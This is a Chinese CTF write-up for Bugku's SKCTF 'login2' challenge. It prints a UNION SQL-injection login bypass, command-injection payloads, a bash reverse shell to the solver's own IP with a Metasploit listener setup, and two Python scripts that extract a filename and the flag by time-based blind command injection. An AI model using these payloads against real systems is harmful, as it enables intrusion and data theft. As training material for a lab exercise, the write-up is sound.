CTF – SKCTF – login2

题目说明

题目来源: ctf.bugku.com

直达: http://118.89.219.210:49165/

解题步骤

union登录绕过

看到题目给出一个登录界面,查看源代码和burpsuite抓包,在HTTP头发现 tip

JHNxbD0iU0VMRUNUIHVzZXJuYW1lLHBhc3N3b3JkIEZST00gYWRtaW4gV0hFUkUgdXNlcm5hbWU9JyIuJHVzZXJuYW1lLiInIjsKaWYgKCFlbXB0eSgkcm93KSAmJiAkcm93WydwYXNzd29yZCddPT09bWQ1KCRwYXNzd29yZCkpewp9

base64解开来是一段源码

1
2
3
$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

源代码可以看出是分布验证用户名和密码,再根据提示:union ,构建payload,用不存在用户绕过登录

1
username=admin' union select 1,md5(1)#&password=1

命令执行爆破

登录成功后,看到进程监控系统页面,尝试输入 123 ,页面返回

apache 22446 0.0 0.0 11352 180 ? R 11:42 0:00 sh -c ps -aux | grep 123

尝试输入 123;ls ,页面返回

apache 22449 0.0 0.0 11352 176 ? R 11:43 0:00 sh -c ps -aux | grep 123;ls

页面没有回显,可能是命令执行了,输出过滤了。也可能是命令被过滤了
尝试输入 123;sleep 5,页面返回时间5.83s,说明命令执行了,输出过滤了

获取FLAG

一、反弹shell

需要公网vps,如果没有可以看第二种

payload:

c=123 ; bash -i >& /dev/tcp/(你的公网IP)/6666 0>&1`

vps的msf监听:

use exploit/multi/handler
set payload linux/armle/shell/reverse_tcp
set lport 6666
set lhost 你的公网IP
set exitonsession false
exploit -j

连接到后直接查看目录(ls),查看(cat) flag 文件就可以拿到 flag

二、爆破

如果不能实现反弹shell,可以借鉴sql盲注的原理,尝试命令执行爆破

关键注入语句

123;a=`ls`;b='a';if [ ${a:0:1} == $b ];then sleep 2;fi

ls 查看当前目录文件,如果第一位等于 'a' ,延时两秒返回,这样就达成了时间盲注

爆破文件名代码

Python3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: virgin-forest
# Time: 2018-08-16 19:33:49
# Describe:

import time
import requests
from bs4 import BeautifulSoup

def get_session():
data = {
"username":"' union select md5(1),md5(1)#",
"password":"1",
}

r = requests.post('http://118.89.219.210:49165/login.php',data=data)

cookie = r.headers['Set-Cookie']
cookie = cookie.split(';')[0]
return(cookie)


def get_file_name(session):
chars = 'abcdefghijklmnopqrstuvwxyz _.1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ{}+-*/='

data = {
"c":"",
}

header = {
"Cookie":session
}
ch = 'css fLag_c2Rmc2Fncn-MzgzZGZnNDc'
for i in range(36):
for char in chars:
payload = '''c=123;a=`ls`;b=\''''+char+'''\';if [ ${a:'''+str(i)+''':1} == $b ];then sleep 2;fi'''

data['c'] = payload
start = time.time()
r = requests.post('http://118.89.219.210:49165/index.php',data=data,headers=header)
end = time.time()
reti = abs(start-end)
if reti > 3.0 and reti < 5: #这里根据网络情况自行调整
ch += char
print(i,ch,reti)
break

get_file_name(get_session())

爆破文件名结果

0 c 3.404446601867676
1 cs 3.3876683712005615
...
34 css fLag_c2Rmc2Fncn-MzRzZGZnNDc.txt 3.37492966651916
35 css fLag_c2Rmc2Fncn-MzRzZGZnNDc.txth 4.1884589195251465

根据返回结果,可以判断文件名为 fLag_c2Rmc2Fncn-MzRzZGZnNDc.txt (为什么这个名字可以这么长???)

爆破一定要网络好!!!
我重复爆破了几次才正确!!!
差点哭出来!!!
垃圾电信!!!

爆破FLAG代码

Python3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: virgin-forest
# Time: 2018-08-16 19:33:49
# Describe:

import time
import requests
from bs4 import BeautifulSoup

def get_session():
data = {
"username":"' union select md5(1),md5(1)#",
"password":"1",
}

r = requests.post('http://118.89.219.210:49165/login.php',data=data)

cookie = r.headers['Set-Cookie']
cookie = cookie.split(';')[0]
return(cookie)


def get_flag(session):
chars = 'abcdefghijklmnopqrstuvwxyz _.1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ{}@+-*/='

data = {
"c":"",
}

header = {
"Cookie":session
}
ch = '> '
for i in range(29):
for char in chars:
payload = '''c=123;a=`cat fLag_c2Rmc2Fncn-MzRzZGZnNDc.txt`;b=\''''+char+'''\';if [ ${a:'''+str(i)+''':1} == $b ];then sleep 2;fi'''

print('[+] '+payload)
data['c'] = payload
start = time.time()
r = requests.post('http://118.89.219.210:49165/index.php',data=data,headers=header)
end = time.time()
reti = abs(start-end)

if reti > 2.0 and reti < 5:
ch += char
print(i,ch,reti)
break

get_flag(get_session())

爆破FLAG结果

0 S 3.436304807662964
1 SK 3.386700391769409
...
27 SKCTF{Uni0n_@nd_c0mM4nD_exEc 3.097593307495117
28 SKCTF{Uni0n_@nd_c0mM4nD_exEc} 3.8327322006225586

虽然最后拿到了FLAG
但还是想说
电信真垃圾!!!